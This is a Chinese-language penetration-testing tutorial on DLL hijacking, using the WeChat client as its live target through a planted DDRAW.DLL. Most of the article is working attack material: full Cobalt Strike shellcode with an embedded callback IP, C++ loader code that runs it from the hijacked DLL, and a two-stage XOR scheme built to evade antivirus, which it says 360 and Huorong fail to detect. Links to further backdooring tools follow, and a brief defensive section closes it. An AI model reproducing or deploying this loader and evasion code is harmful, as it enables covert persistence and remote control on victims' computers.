前言
DLL劫持漏洞是老生常谈的一个漏洞,已经被前辈们各种奇技淫巧玩烂。但DLL劫持技术在后渗透和域渗透中的权限提升和权限维持都起到了至关重要的作用。本文简单剖析DLL劫持技术并通过实例应用来查看如何在渗透工作中利用此项技术。篇幅稍长,各位读者耐心观看,文中有不妥之处请各位加以斧正。
DLL劫持原理
什么是DLL?
DLL是动态链接库文件,在Windows系统中,应用程序并不是一个完整的可执行文件,它需要调用对应的DLL来完成相应的功能。一个应用程序可以使用多个DLL,一个DLL可以被多个应用程序使用。
DLL劫持漏洞产生原因
开发者在调用DLL时没有指定绝对路径,那么Windows就会按照特定的顺序去查找DLL,因此,黑客如果能够优先将DLL置于有效目录,就能够欺骗系统加载恶意DLL,实现DLL劫持。
如上图,应用程序执行需调用LPK.dll,该DLL在"C:Windowssystem32"目录下,但是由于系统优先搜索当前目录"C:UserspcDesktop",所以如果当前目录存在恶意的DLL,程序会优先加载,从而导致漏洞产生。
Windows中应用程序搜索DLL的顺序
Window中默认搜索DLL的顺序为:
1.程序所在目录
2.系统目录即 SYSTEM32 目录。
3.16位系统目录即 SYSTEM 目录。
4.Windows目录。
5.加载 DLL 时所在的当前目录。
6.PATH环境变量中列出的目录。
为了应对DLL劫持漏洞,微软在Windows7以上的版本将一些容易受到劫持的DLL写入了注册表HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs中,在此项中的DLL都被禁止从程序所在目录调用,而只能从系统目录"C:WindowsSystem32"中调用。
不过终究是治标不治本,事实上攻击者只需要查找KnownDLLs注册表项中不存在且被应用程序调用的DLL,即可绕过这一限制。
DLL劫持的一般步骤
劫持Windows应用程序的DLL一般需要以下步骤:
1.启动应用程序
2.使用ProcessMonitor等工具查看应用程序启动后加载的DLL
3.从加载的DLL中筛选出不存在于HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs注册表项中的DLL
4.编写劫持代码生成劫持DLL
5.将编写好的DLL置于程序目录中并重新启动程序
6.查看是否劫持成功
如何利用DLL劫持微信并上线CS
这里我们通过劫持最新版微信,来更直观的认识和了解DLL劫持漏洞的利用。
DLL选择
首先下载安装最新版微信并运行,使用ProcessMonitor查看微信运行后调用的DLL情况。
Process Monitor一款系统进程监视软件,总体来说,Process Monitor相当于Filemon+Regmon,其中的Filemon专门用来监视系统中的任何文件操作过程,而Regmon用来监视注册表的读写操作过程。
下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procmon
这里我们需要将图示红框中的功能关闭,它们分别是注册表监控、网络监控、进程线程监控,我们只需要监控文件系统。
接下来我们需要筛选出微信程序的文件监控,在Filter中选择Filtel..,创建如下规则:
添加并应用规则后,我们可以更直观地观察微信程序调用DLL的情况。存在劫持漏洞的DLL一般存在以下几个特征:
不在注册表项HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs中
先从程序当前目录调用,并在搜索不到后进入系统目录调用
这里发现有几个DLL符合特征,我们选择DDRAW.DLL进行测试:
测试发现劫持某些DLL会导致微信退出时崩溃,建议在测试环境测试后再投入实战
事实上,对于在可能存在劫持漏洞DLL的查找上面已经有相关的懒人工具,如DLL Hijacking Auditor、rattler、DLLHijack_Detecter等等,但相应的存在一定的误报率和运行问题。
劫持DLL制作
编写一个劫持DLL,需要两个步骤:
查看被劫持DLL的导出函数表
编写实现劫持DLL向原DLL的函数转发,并在过程中加入你的恶意代码
这对不熟悉编程技术的安全从业者来说是一个复杂的过程,但我们可以使用AheadLib或DLL_Hijacker.py这两款工具来生成相应的cpp代码,只要简单加入我们的劫持代码并重新编译出DLL即可。(个人喜欢使用后者来生成代码,原因有二,一是python脚本使用方便,二是AheadLib使用易语言编写,杀软对易语言程序不友好。两款工具工作笔者都已测试,编译生成的DLL皆完好可使用)
工具下载地址:
AheadLib:https://github.com/strivexjun/AheadLib-x86-x64
DLL_Hijacker:https://github.com/coca1ne/DLL_Hijacker
这里我们利用DLL_Hijacker.py生成对应的cpp代码:
python DLL_hijacker.py c:WindowsSysWOW64ddraw.dll
接下来我们在VS2015中新建项目,创建c++空项目,命名为DDRAW:
在项目属性中我们需要进行简单设置,将配置类型改为动态库(.dll),MFC的使用改为在使用标准Windows库,目标文件扩展名改为.dll
MFC的使用选择在静态库中使用MFC会将相关代码写入DLL中,可以运行在没有相关DLL的系统中,但是缺点是生成的DLL体积较大,选择此选项保证DLL在不同系统中可以正常运行。
在项目的源文件中新建DDRAW.cpp文件,并将DLL_hijacker.py生成的cpp代码粘贴过来后编译:
然后我们将编译好的DLL放入微信程序目录中,并重新启动微信,可以发现劫持成功:
DLL劫持到CS上线
当然我们并不能满足于单纯的弹框,我们需要利用此漏洞来实现权限维持。
首先cs生成shellcode:
在代码中申请执行内存并执行我们的shellcode,核心代码如下:
typedef void(__stdcall* JMP_SHELLCODE)();
unsigned char shellcode[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68xb8x22x00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx37x6dx44x74x00x0ex10x00x9dx32xdcx4dxa3xd2x4cx42xbbx3ax26x92x3axeaxd9x2cx08x8axaax18xd3x3bx30xccxe4x01x3axe7x36x68x6ax0bx0ax16xe5xc2xc2xfbx17x53xddx85x34x49x4dxe3x57xb6x53xf5xd9xfcxbcxbfx61x42xd1x17xb1x93x36x65xd9x78x54xc4x8fx9cx76xa9x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x4ex50x30x32x29x0dx0ax00x84xdcxd4xdex3cx35x45x34xddx7cxcfx75x18x5dx7bx82xb5xc7x62x1bxc1x6ax9bx85x4ex21x82x75x88x8dxb2x9ax49x4dx07xc7x4dx9dx0cxc4xb6xc6x3execxc5x12x13xfcx00x94x17xa6xdfx3exa1x6axa9x47xb7xc7x63x72xbaxaex8ax37xf1x2axacx5dx5cx59x83x7bxa1xf5xfcx9bx52x28xb4x5ax13x65xc3xe0x59x1exd0xe5x33x8ex4fx5fx1fx0cx84xcdxf6x78x76x26xfax4cxaaxc5x7dx13x93x9dx47x84x53xb8xa3x7ax29xf9xc1x47x0axddxfcx80x04xaexa8xebx64xa3xb6xb0x7fx1fxd7x56x31x87xc8x8bx60x39x3cxedxb8xa9x7ex5bxbex07xe1x0fx7bxc3x88xe2x8dxc9xb7x03x6axd3xd6x3ax34x4axb8x36x6fx0axdbx8cxf5x23x95xb0x15x30xfcx33xa2x2cx63x69x12xbbx98x9exf6x4dx82xaaxcax72x51x1fxcax10x44x65xb1xd9xd6x7dxc9xaax0dx0exdaxdbx88x4bx00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex31x35x37x2ex31x33x34x00x12x34x56x78";
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
LPVOID lpBase = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpBase, shellcode, sizeof(shellcode));
JMP_SHELLCODE jmp_shellcode = (JMP_SHELLCODE)lpBase;
jmp_shellcode();
return 0;
}
然后创建线程并在主函数dllmain中执行即可。将编译好的DLL置于微信目录,重启微信,此时CS成功上线:
绕过杀软上线CS
在实际环境中,shellcode可能会被杀软识别查杀,我们还需要对shellcode进行免杀处理。我们可以把shellcode加密处理,执行的过程中再进行解密,此时shellcode便具有一定的免杀能力。也可以对shellcode进行分段多重加密再分段解密,免杀效果会更好。
在安装了杀毒软件的环境中,DLL编译完成后被查杀:
我们考虑通过加密的方式将我们的shellcode隐藏。 这里我们新建工程,在代码中,我们使用XOR方式将shellcode分段加密,利用程序获取加密后的shellcode,核心代码如下:
#define KEY 0x99 //第一段XOR key
unsigned char ShellCode[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68xb8x22x00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx53x58x6cx45x00x81x43xbaxf6x98x63x16xc9x6ax76x08xd9xa1x22x06xb9x91xaexf2x9cx43x54x45x60x4dxcax7dx34x1dx0dxccxe9x9bxe3x8bxb5xa2x18xf8x88x22x0bx29xdbx90x31xb6x82x96xc4x18x74x66x42x0axefx66x40x14xf5x9ex6dx93x2bxcbx33x3axf4xbfx27x74xd7x81x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex30x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x29x0dx0ax00x82x79xfdxc6xc5xfcx18x09xf1x8dxdax55xf4x79x75x7dx85xf7x98x75x65xaaxe7xeexb4x9cxedx10x87x33x38x34x6fx2ex6cx83x0ax78x28x58x1fx91x58x50x73xcax05x6axf0xe3x12x9ex31x5dxbfx02xb1x8bxf5x8exc9x3axeex97x3ax9ax6bx32x3dxd1x31x63x3fxebxd0xe0xa0x5dx00xb9xd9xe6x7ex0ax89xd6xcfx94xa7x3cx74xeax2cx69xecx54x39xe1x66xbbx83xa9x2bx0dxe0xe0xc7xcdxa9x88x5bx06x84xfax87xf7x84x03x0cxa7xb0xaax3bx09xeaxf0x6bxcex9cxa2xf4xecx21x8bx5cx12xaex93xb9x2exd6x3fx15x8exa1x46xecx87x72x2fx70xd7x4exe9x5cx24x56xabxcexaex5exd2x0bx7ax56x12xddx5ax33x7cx8bx23x4ex32xc0xacx90x89xecxabxd6x3cx9cx34xd0xd0x56x52xedxf0xc9x3axe4x8ax9ex9dx87xe9x51x19xecxa6xf1x7fx19xa2x52x69x03x22x3exc2x44xc8x42x6cxa7x1cx54x98x78x33x6dxe3xb4x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex31x35x37x2ex31x33x34x00x12x34x56x78";
int main()
{
unsigned char enShellCode1[sizeof(ShellCode)];
unsigned char enShellCode2[sizeof(ShellCode)];
for (int i = 0; i < sizeof(ShellCode) - 501; i++)
{
enShellCode1<i> = ShellCode<i> ^ KEY; //第一段XOR加密
printf("\x%x", enShellCode1<i>); //获取第一段加密结果
}
char key[] = "chris"; //第二段XOR key
int j = 0;
for (int i = sizeof(ShellCode) - 501; i < sizeof(ShellCode)-1; i++)
{
if (j == sizeof(key) - 1)
j = 0;
enShellCode2<i> = ShellCode<i> ^ key[j]; //第二段XOR加密
j++;
printf("\x%x", enShellCode2<i>); //获取第二段加密结果
}
return 0;
}
拷贝结果,替换劫持代码中的shellcode,并在执行函数中将我们的原始shellcode解密出来,核心代码如下:
#define KEY 0x99 //第一段key
unsigned char shellcode[] = "x65x71x10x99x99x99xf9x10x7cxa8x4bxfdx12xcbxa9x12xcbx95x12xcbx8dx12xebxb1x96x2exd3xbfxa8x66xa8x59x35xa5xf8xe5x9bxb5xb9x58x56x94x98x5ex7bx69xcbxcex12xcbx89x12xdbxa5x98x49x12xd9xe1x1cx59xedxd3x98x49xc9x12xd1x81x12xc1xb9x98x4ax7axa5xd0x12xadx12x98x4fxa8x66xa8x59x35x58x56x94x98x5exa1x79xecx6dx9axe4x61xa2xe4xbdxecx7bxc1x12xc1xbdx98x4axffx12x95xd2x12xc1x85x98x4ax12x9dx12x98x49x10xddxbdxbdxc2xc2xf8xc0xc3xc8x66x79xc1xc6xc3x12x8bx72x1fxc4xf1xf7xfcxedx99xf1xeexf0xf7xf0xcdxf1xd5xeexbfx9ex66x4cxa8x66xcexcexcexcexcexf1xa3xcfxe0x3ex66x4cx70x1dx99x99x99xc2xa8x50xc8xc8xf3x9axc8xc8xf1x21xbbx99x99xcaxc9xf1xcex10x6x5fx66x4cx72xe9xc2xa8x4bxcbxf1x99x9bxd9x1dxcbxcbxcbxcaxcbxc9xf1x72xccxb7xa2x66x4cx10x5fx1ax5axc9xa8x66xcexcexf3x66xcaxcfxf1xb4x9fx81xe2x66x4cx1cx59x96x1dx5ax98x99x99xa8x66x1cx6fxedx9dx10x60x72x90xf1x33x5cx7bxc4x66x4cx10x58xf1xdcxb8xc7xa8x66x4cxa8x66xcexf3x9exc8xcfxc9xf1x2excex79x92x66x4cx26x99xb6x63x68x4bxaex7xd4x59x8dx80xe2x62x68x72x80xbax62x68x72x81xf8x9cx97x8dx46x20x3bx4x37x69xf2x20xd2x84xf1x10x75xa1x18x1fx7bxbaxc9x50x6fxcaxf2xc6x80xf5x30x37x2dx12x24xb9x1ex5cx6fx64xbfx8axf3x91xe2xc6xc1x70x8axe1x51x68x41xa9xf9x42xd5xeaxe4xadx6bx17xex30x63x9cx5x28x66x9cxedxexfbx59xa2x40x59x9cxcdx4ex7xb4xe9x72x3cx0x6x1ax5fx28x14x6x6x6x53x53x2ex7x8x0x1fxfx9x5dx5cx5dx53x48x5axax1cxex18x13x1dx1ax1x4x17x52x53x2ex3bx3bx2cx53x5ax46x42x52x53x34x1x1cxdx1cx14x1bx52x27x27x43x5ex5cx59x48x43x3cx0x0x17x6x6x6x46x46x4dx58x5bx64x79x63xeaxbx94xb5xa6x94x6ax60x82xeexb2x27x9dxax16x15xf7x9exebx16xdxd8x8ex9dxd7xf4x9fx79xf4x50x50x46x6x5dxfxebx78x11x5bx3bx77xe3x31x23x10xa2x77x3x83x80x7axecx58x2exdcx6axc3xe2x86xedxa1x48x87xe4x59xf2x19x5bx4exb2x59x11x56x98xb3x88xd2x34x73xdaxb1x94x17x79xeaxbexbdxfdxd4x5fx1cx98x45x1ax8fx3cx4bx88x15xd8xebxdbx42x7ex83x88xb5xa4xdaxebx33x74xedx89xe4x9fxf6x6ax7fxc4xd8xd8x52x7ax89x98x19xa7xefxc1x9cx9ex48xf8x3fx7axdcxfaxcax4dxbex4dx7cxfdxc2x2ex9exeex1x4cx18xa5x27x9ax3fx4cx24xc2xbdxcdx36xa0x62x9x35x7axafx33x40x1fxe3x51x27x41xa3xc4xe2xe0x9fxc8xbex4exf5x47xb3xb8x24x3bx9ex93xa1x48x8dxf9xfdxf5xf5x80x22x7ax84xd4x98xcx7axcax20x0x70x41x56xb0x2dxbbx21x4xd5x75x27xfbx10x41x4x90xd7x68x1ax99xc6xc1x3ex8dxbcx19x23x0x72x79x73x63x0x72x69x33x63x3fx1ax31xd7x30x8dx8dxbcxe0xdax68x72x69x73x62xb1x23x3axfax84x3fx1ax69x53x63x68x21x3fx1bx71xfexfbx8bx8cxb6xedxb2x1dxb5xe8x6fx73xaaxf6xa3x1dx97x31xb0x8bxc1x8fx96x8cx52x51x40x47x42x55x50x5cx58x46x54x46x43x5ax47x63x7ax46x3fxb";
unsigned char shellcode2[sizeof(shellcode)];
char key[] = "chris"; //第二段key
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
for (int i = 0; i < sizeof(shellcode) - 501; i++)
{
shellcode2<i> = shellcode<i> ^ KEY; //解密第一段
}
int j = 0;
for (int i = sizeof(shellcode) - 501; i < sizeof(shellcode) - 1; i++)
{
if (j == sizeof(key) - 1)j = 0;
shellcode2<i> = shellcode<i> ^ key[j]; //解密第二段
j++;
}
LPVOID lpBase = VirtualAlloc(NULL, sizeof(shellcode2), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpBase, shellcode2, sizeof(shellcode2));
JMP_SHELLCODE jmp_shellcode = (JMP_SHELLCODE)lpBase;
jmp_shellcode();
return 0;
}
此时,我们的DLL编译完成后已经不会被杀软查杀,将DLL放入微信目录中,启动微信:
成功上线,执行命令,火绒与360均无反应。
其他玩法
当然DLL劫持还有很多其他玩法,如利用InjectProc实现自动注入,backdoor-factory免杀结合MSF上线,IAT导入表注入劫持,权限提升等,篇幅有限,这里不作赘述,各位可自行尝试。
工具链接:
InjectProc:https://github.com/secrary/InjectProc/releases
backdoor-factory:https://github.com/secretsquirrel/the-backdoor-factory
IAT:https://pan.baidu.com/s/1w8T5vgfGnIBU2Gkpq1kogQ 提取码:c29j
如何防范DLL劫持
对于DLL劫持漏洞产生的原因,并不能单一的归咎于微软,只能说这是微软的一个“设计缺陷”,要从根本上防御DLL劫持漏洞,除了微软提供的“安全DLL搜索模式”和“KnownDLLs注册表项”机制保护DLL外,开发人员必须要做更多来保护应用程序自身。开发过程中,调用LoadLibrary,LoadLibraryEx等会进行模块加载操作的函数时,使用模块的物理路径作为参数。在程序调用DLL时使用“白名单”+ “签名”进行DLL的验证。 不过即使使用了这些防御措施,DLL劫持漏洞依旧可能会存在,更何况目前很多厂商对于DLL劫持漏洞都是持“忽略”的态度。
参考资料